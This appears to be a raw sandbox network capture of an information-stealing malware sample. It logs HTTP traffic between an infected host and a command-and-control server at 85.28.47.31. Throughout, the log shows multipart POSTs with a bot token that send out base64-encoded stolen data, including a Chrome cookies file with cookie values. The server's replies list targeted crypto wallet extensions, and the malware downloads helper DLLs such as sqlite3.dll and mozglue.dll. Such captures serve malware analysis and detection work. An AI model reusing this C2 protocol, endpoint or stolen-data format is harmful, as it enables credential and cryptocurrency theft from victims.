Jul 26, 2024 17:56:04.292498112 CEST	1164	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Jul 26, 2024 17:56:04.294445038 CEST	466	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKEC Host: 85.28.47.31 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a Data Ascii: ------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="message"fplugins------IIEHJKJJJECFHJJJKKEC--
Jul 26, 2024 17:56:04.545780897 CEST	335	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:04 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Jul 26, 2024 17:56:04.569919109 CEST	199	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHII Host: 85.28.47.31 Content-Length: 6975 Connection: Keep-Alive Cache-Control: no-cache
Jul 26, 2024 17:56:04.569971085 CEST	6975	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 Data Ascii: ------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Jul 26, 2024 17:56:05.297321081 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 17:56:05.624747992 CEST	90	OUT	GET /8405906461a5200c/sqlite3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Jul 26, 2024 17:56:05.855222940 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:05 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Jul 26, 2024 17:56:05.855264902 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Jul 26, 2024 17:56:05.855278969 CEST	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Jul 26, 2024 17:56:05.855408907 CEST	1236	IN	Data Raw: c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 83 ec 18 8b 4d 08 85 c9 74 0c 89 0c 24 ff 15 4c 66 eb 61 99 eb 04 31 Data Ascii: ]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aSuK?
Jul 26, 2024 17:56:07.318387032 CEST	949	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHC Host: 85.28.47.31 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------KJKJJEGIDBGIDGCBAFHC--
Jul 26, 2024 17:56:07.869615078 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 17:56:07.996534109 CEST	561	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
Jul 26, 2024 17:56:08.200387955 CEST	561	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
Jul 26, 2024 17:56:08.513005972 CEST	561	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
Jul 26, 2024 17:56:09.122256994 CEST	561	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
Jul 26, 2024 17:56:09.923981905 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 17:56:10.660952091 CEST	561	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="file"------AEGIJKEHCAKFCAKFHDAA--
Jul 26, 2024 17:56:11.990540028 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 17:56:11.992377996 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 17:56:11.998151064 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 17:56:12.372977972 CEST	90	OUT	GET /8405906461a5200c/freebl3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Jul 26, 2024 17:56:12.578092098 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:12 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Jul 26, 2024 17:56:13.226267099 CEST	90	OUT	GET /8405906461a5200c/mozglue.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Jul 26, 2024 17:56:13.405447006 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:13 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Jul 26, 2024 17:56:14.264720917 CEST	91	OUT	GET /8405906461a5200c/msvcp140.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
